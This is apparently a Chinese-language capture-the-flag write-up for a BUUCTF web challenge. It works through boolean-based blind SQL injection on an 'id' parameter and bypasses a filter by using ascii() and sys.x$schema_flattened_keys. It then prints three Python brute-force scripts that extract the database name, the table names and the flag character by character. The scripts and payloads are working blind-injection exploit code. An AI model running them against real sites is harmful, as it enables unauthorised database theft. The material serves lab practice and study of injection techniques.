id=1时提示:
Nu1L
id=2时提示:
V&N
id=0(不存在)时提示:
Error Occured When Fetch Result.
触发WAF时提示:
SQL Injection Checked.
输入if(0,1,2),因为0是false,所以等同id=2,输出V&N
输入if(1,1,2),因为1是true,所以等同id=1,输出Nu1L
判断当前数据库名长度,等于21时返回Nu1L,证明语句为真:
if((length(database()))=21,1,2)
“if(ord”这个组合拳被过滤掉了,把ord()改为ascii()就好:
import requests url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php" payload1 = "if((ascii(substr(database()," payload2 = ",1))=" payload3 = "),1,2)" name = "" for i in range(1,22): for j in range(23,123): payload = payload1+str(i)+payload2+str(j)+payload3 data = {'id':payload} s = requests.post(url,data=data).text if ("Nu1L" in s): name += chr(j) print(name) break
得到库名为give_grandpa_pa_pa_pa。继续爆表名,information_schema被过滤了,查了下资料,可以用sys.x$schema_flattened_keys代替
判断表名长度,等于39时返回Nu1L,证明语句为真:
if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)
爆表:
import requests url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php" payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database()))," payload2 = ",1))=" payload3 = "),1,2)" name = "" for i in range(1,40): for j in range(23,123): payload = payload1+str(i)+payload2+str(j)+payload3 data = {'id':payload} s = requests.post(url,data=data).text if ("Nu1L" in s): name += chr(j) print(name) break
得到两个表名:f1ag_1s_h3r3_hhhhh,users233333333333333
正常应该爆列名,因为information_schema被过滤懒得搞直接猜测flag在flag列里了。。稍微改了下长度,为了快点换成了小字典。
import requests url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php" payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh))," payload2 = ",1))=" payload3 = ",1,2)" name = "" dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}" for i in range(1,50): for j in dic: payload = payload1+str(i)+payload2+str(ord(j))+payload3 data = {'id':payload} s = requests.post(url,data=data).text if ("Nu1L" in s): name += j print(name) break